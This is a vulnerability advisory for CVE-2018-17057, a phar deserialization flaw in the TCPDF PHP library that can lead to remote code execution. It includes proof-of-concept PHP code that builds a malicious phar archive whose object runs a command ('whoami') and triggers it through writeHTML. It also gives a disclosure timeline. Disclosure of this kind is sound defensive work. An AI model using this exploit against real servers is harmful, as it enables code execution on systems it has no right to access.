CVE-2018-17057: phar deserialization in TCPDF might lead to RCE --------------------------------------------------------------- Affected products ================= TCPDF <= 6.2.19 Background ========== "Started in 2002, TCPDF is now one of the world's most active Open Source projects, used daily by millions of users and included in thousands of CMS and Web applications." - "PHP library for generating PDF documents on-the-fly." - Description =========== TCPDF allows the developers to insert HTML code inside the PDF, which will be translated to a similar-looking design during PDF creation. For example it is possible to insert basic HTML tags, such as "img" or "b" and have the image and bold text placed in the output PDF. The library allows also to include custom CSS rules by defining a "link" tag, like the following: While it is a nice feature to have for the developer, it may cause problems in case the PDF creation script is vulnerable to Cross-Site Scripting (or "Code Injection") issues through which an attacker can inject arbitrary HTML code. For example during an invoice creation, an attacker can use its information written on the invoice to insert a malicious "link" tag pointing to a local phar archive and trigger a PHP Object Injection through the phar:// scheme once the web application reads that file. Exploit ======= In order to test this vulnerability it's enough to clone the project from github and checkout a vulnerable version, such as 6.2.19: git clone && cd TCPDF && git checkout tags/6.2.19 After that it is possible to craft a phar archive containing a malicious PHP Object and potentially trigger a RCE, here is a vulnerable code which helps to reproduce the issue: hook); } } /* include the main TCPDF library */ require_once('tcpdf.php'); /* create new PDF document */ $pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false); /* set document information */ $pdf->SetAuthor('polict'); $pdf->SetTitle('Proof of concept'); /* start pdf */ $pdf->AddPage(); /* create some HTML content */ $html = ''; /* insert the HTML content -- exploit will trigger here */ $pdf->writeHTML($html, true, false, true, false, ''); /* close and output PDF document */ $pdf->Output('poc.pdf', 'I'); In order to create the evil archive it's possible to use PHP: startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub(''); $malicious_object = new Vulnerable(); $malicious_object->hook = "whoami"; $phar->setMetadata($malicious_object); // <-- inject the trigger $phar->stopBuffering(); The archive will be in 'poc.phar'. Note: This vulnerability depends on the developer using writeHTML() with user-supplied input. Author ====== This issue was discovered by polict ( Timeline ======== 17 august 2018: —> report to developer 14 september 2018: —> ping <— released 6.2.20 (which re-introduced the vulnerability reported by Sam Thomas, see's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf ) —> ping about re-introduction of old vulnerability <— released 6.2.22 with fix for both MITRE assigned CVE-2018-17057 17 march 2019: public release